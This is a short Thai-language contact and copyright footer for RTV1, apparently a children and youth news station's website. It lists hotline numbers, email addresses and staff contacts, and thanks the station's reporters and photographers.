โปรดแจ้ง สำนักข่าวเด็กและเยาวชน โทร.สายด่วน 085-979-8473 หรือส่งอีเมล์ rtv1_mobilestation@hotmail.com
 
ติดต่อประชาสัมพันธ์ข่าวสารต่างๆ โทร. 082-636-0445 เด็กหญิงสุทธิดา  สีดาธรรม (มุก)
ติดต่อประสารงานต่างๆ โทร. 084-111-6149 เด็กหญิงบุญยานุช รอดปัญญา (แจง)
 
กองบรรณาธิการและสำนักข่าวเด็กเยาวชน สถานี อาร์ ทีวี วัน ขอแสดงความขอบคุณมายังนักข่าว และช่างภาพ ทุกท่านที่ร่วมกันทำหน้าที่ดี ๆ 
มีประโยชน์ต่อสังคม ในการเผยแพร่ข่าวสารสู่สาธารณะชนอย่างต่อเนื่อง   และเชื่อมั่นว่าทุกท่านจะรักษาไว้ซึ่งคุณภาพของการนำเสนอข่าวสาร
และมิตรภาพในสื่อออนไลน์แห่งนี้ของเราต่อไป ข้อมูล เนื้อหา รูปภาพทั้งหมดนี้เป็นลิขสิทธิ์ของ RTV1.NET

Web Counter
ติดต่อ e-mail : rtv1_station_thailand@hotmail.com

@ copy 2007 by rtv1
Free Web Hosting